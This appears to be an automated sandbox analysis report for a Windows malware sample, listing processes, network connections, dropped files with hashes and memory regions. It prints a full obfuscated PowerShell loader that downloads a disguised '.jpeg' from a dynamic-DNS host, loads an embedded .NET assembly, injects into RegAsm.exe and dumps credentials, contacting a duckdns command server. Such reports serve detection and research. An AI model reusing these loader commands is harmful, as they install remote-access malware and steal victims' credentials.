㏴EI≩ ⫻ ㏤ ≪ ㏴eQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YgBs≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BU≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴E8≩ ⫻ ㏤ ≪ ㏴LgBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBl≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴7≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bt≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BN≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴VgBB≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴bwBr≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴bwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴WwBd≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴B4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBC≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴UgBU≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴O≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴4≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴NQ≩ ⫻ ㏤ ≪ ㏴z≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lg≩ ⫻ ㏤ ≪ ㏴y≩ ⫻ ㏤ ≪ ㏴Dk≩ ⫻ ㏤ ≪ ㏴MQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴DM≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴x≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBS≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cwBh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnpdpdqccvpmiaqbmzkkghvqxevktzhde"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\givwq"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ikiorfmye"

Network

Country Destination Domain Proto
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 107.173.192.135:80 107.173.192.135 tcp
US 8.8.8.8:53 135.192.173.107.in-addr.arpa udp
US 8.8.8.8:53 servidorwindows.ddns.com.br udp
BR 191.55.76.236:80 servidorwindows.ddns.com.br tcp
US 8.8.8.8:53 236.76.55.191.in-addr.arpa udp
US 107.173.192.135:80 107.173.192.135 tcp
US 8.8.8.8:53 wemberdag.duckdns.org udp
MY 103.186.116.99:31388 wemberdag.duckdns.org tcp
US 8.8.8.8:53 99.116.186.103.in-addr.arpa udp
MY 103.186.116.99:31388 wemberdag.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

memory/1268-0-0x00000000710EE000-0x00000000710EF000-memory.dmp

memory/1268-1-0x0000000000D20000-0x0000000000D56000-memory.dmp

memory/1268-2-0x00000000710E0000-0x0000000071890000-memory.dmp

memory/1268-3-0x0000000004F00000-0x0000000005528000-memory.dmp

memory/1268-4-0x0000000004B40000-0x0000000004B62000-memory.dmp

memory/1268-6-0x0000000004E50000-0x0000000004EB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwh4c4yg.f1y.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1268-5-0x0000000004DE0000-0x0000000004E46000-memory.dmp

memory/1268-16-0x0000000005630000-0x0000000005984000-memory.dmp

memory/1268-17-0x0000000005AB0000-0x0000000005ACE000-memory.dmp

memory/1268-18-0x0000000005B60000-0x0000000005BAC000-memory.dmp

memory/1268-31-0x00000000710E0000-0x0000000071890000-memory.dmp

memory/1268-19-0x0000000006CC0000-0x0000000006CF2000-memory.dmp

memory/1268-21-0x000000006DB00000-0x000000006DE54000-memory.dmp

memory/1268-32-0x0000000006C80000-0x0000000006C9E000-memory.dmp

memory/1268-20-0x000000006D9A0000-0x000000006D9EC000-memory.dmp

memory/1268-33-0x0000000006D90000-0x0000000006E33000-memory.dmp

memory/1268-34-0x00000000710E0000-0x0000000071890000-memory.dmp

memory/1268-35-0x00000000074C0000-0x0000000007B3A000-memory.dmp

memory/1268-36-0x0000000002860000-0x000000000287A000-memory.dmp

memory/1268-37-0x0000000006EC0000-0x0000000006ECA000-memory.dmp

memory/1268-38-0x00000000070D0000-0x0000000007166000-memory.dmp

memory/1268-39-0x0000000007030000-0x0000000007041000-memory.dmp

memory/1268-40-0x0000000007060000-0x000000000706E000-memory.dmp

memory/1268-41-0x0000000007070000-0x0000000007084000-memory.dmp

memory/1268-42-0x00000000070B0000-0x00000000070CA000-memory.dmp

memory/1268-43-0x00000000070A0000-0x00000000070A8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.cmdline

MD5 9173ea2c6e60d7e7013e90301146eb97
SHA1 90aa77a27469dbba2552fa244d90ff43bc75edb0
SHA256 15d63d6d23dabcd2012954923fbbb1bc991f49a303398965d93bb02fd8d2a236
SHA512 409985c3cf8b1dd93fce47fd522da2229dbe33078a5c02201b62b1af7679eee9c90743d34ea33264c78019e83d7dc1360efa96661ed82c155669e00971904542

\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.0.cs

MD5 d71dc34ff8dbecd13f179ed952a841d5
SHA1 78c3b0d410495a39154fbd26663468d6e5de5768
SHA256 19b4037d5d9fa1532eb40ab0f16ad5a5c96cb3d9d3ab27b3e4e82ea74f3cf175
SHA512 2b6397a38038caa9b412460801b007615461db4f8e24a8896f17cad90bc5d50286682387cc524aee6c3a38172d9932a125aef07c5ebdcc406ef7203a577aa84f

\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\CSC8A85977435C44FDE89D0A35EC9FA1467.TMP

MD5 41acd61e2e83a5fd56b1293c4167bcae
SHA1 8c8baaaba80c34db413807a6484ec15b43e37611
SHA256 c638114c1cdb235b4081d2bfce54854d4cac747e14a3913cff0c900f9e2c8675
SHA512 c3a962da8363ffa57fecc8f46e4feff4d102ee40431c0c6fc2c7a58c5eb5f5e61097c8d5d3d1500722d42aacfa6b8d03bcfb92d271d3bcac87f53525985f6905

C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp

MD5 1e78cc30f119d4f8e3f6731de8a6f795
SHA1 6944fbc747ad100117827ea80f18e42450e7bdf7
SHA256 599b151d6ebe1fa03335bd528ff402d8ceb9bd2014a68a16c48f2f27ad413ddf
SHA512 a3005e8270ef62b1f51e21a208156e76c1e62d35bef3eccd5bd8bea543a7adaa23b572efa151e87cf29eb6b1f4ce6daaf20fd38e83c5eecaf0c2f31d1de2f074

C:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.dll

MD5 69f0fc652690f227ace9111ed7af6c08
SHA1 54b3d492fd11f7fe7438417ab9163e0bc25dc583
SHA256 9a77f8d37510cf581aff135c6a06fb993c03a3f52e4993bbd99469c8307e3df5
SHA512 8a7d3938f98b55ddfe44fb106d2c83c9373250ed41f2df4d0a496cfdb2d91b2f31a44917af0814bfc4f78e458616d6b1cbc84de38a284658a50ddf281c35a756

memory/1268-56-0x00000000070A0000-0x00000000070A8000-memory.dmp

memory/1268-62-0x0000000007340000-0x0000000007362000-memory.dmp

memory/1268-63-0x00000000080F0000-0x0000000008694000-memory.dmp

C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS

MD5 7788462fff77921361629f1053e761ec
SHA1 9414413ddaa18d38c3f7cd7119e1958e8afcb5df
SHA256 fc4746b756fb20e572af314479447accf175c9eddfac1ea9b73326c2f410a753
SHA512 e4a138ad53a31d60c6db73da16ceb4f15d9d40639b72e1c5e872492b7a25aa32ad7ed8aacb64bc9379a735c49786a35edf200e652876f70e3009aba6326abbc5

memory/1268-69-0x00000000710E0000-0x0000000071890000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 9faf6f9cd1992cdebfd8e34b48ea9330
SHA1 ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA256 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA512 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9de382fd4dc20d3b76c2deb3363e79b2
SHA1 bb54d449fda9c8e35771a8aaccc59ce0cb6d00a8
SHA256 fd0e7351178daa940495f1efdb5d7c401f688b57d1b288dc4a7bcf1329f68573
SHA512 8a52b0cbc3ee6fce0d0d36efb4f274fbf72f5599aceffc537c2380cd35a8ac1dec5f5e7d18e3a906977d554b196247b9094ee3fcabb654d6242d75c7e3287667

memory/3472-90-0x0000000007550000-0x0000000007672000-memory.dmp

memory/3472-91-0x0000000007710000-0x00000000077AC000-memory.dmp

memory/1928-92-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-94-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-96-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-97-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-100-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-101-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e78ef69666be8b8361e3c7acf886947
SHA1 c7879d03318d9f5c8bc560233650dd3aa125f8cc
SHA256 68b36c239c95ea820abe199f6e546706b1b13dfdc1b18b2bf3918654924a39c0
SHA512 ea70fe9e86a5f1c4d34d879d564842e1dd5c45cdebd11f1636b39d6cc4d6c5c550f6307571b9f44b9f39c069604d129274d6dd2795115ea90cc383fa31039736

memory/1928-105-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-104-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-106-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-109-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-110-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-111-0x0000000000400000-0x0000000000482000-memory.dmp

memory/4312-112-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2780-113-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3612-114-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2780-115-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3612-120-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4312-122-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2780-121-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3612-119-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4312-118-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4312-116-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vnpdpdqccvpmiaqbmzkkghvqxevktzhde

MD5 a7e181f6aa185be0ab0ca68b30406fe6
SHA1 58c86162658dc609615b8b6400f85c92506dfdc8
SHA256 c3071dc55b94db225d9c0f2c1b21c7e8f27dbfd168b85b7d618d8d19950e7ff2
SHA512 49969eb10e0bf7925940eb7374451f811658ef9ccfb83b86fb337c4d06c3ba17eb0181f598d9e0ec9ca25bfaf644209ac47b73d62ac924e73d03a4dcf8f8dd0f

memory/1928-129-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1928-133-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1928-132-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1928-134-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Roaming\logs\logs.dat

MD5 1ad97e27142176094ccb89be4eebc6ef
SHA1 a0600f05c21572e5240cfa3871aa08b24d2daa4f
SHA256 bfb7c5f699b66458ab201aa9bceb2b768e25b91dfc8b7a70f196e709b94b984a
SHA512 434e448772bdad81682738c003f44b5b0cc1b2f6308e25464efb5be7dadb8302e27a1dd3d938c9857b5a422a53fb86056694484b0c398eb6eeb90404d735841f

memory/1928-140-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-141-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-148-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-149-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-156-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-157-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-164-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1928-165-0x0000000000400000-0x0000000000482000-memory.dmp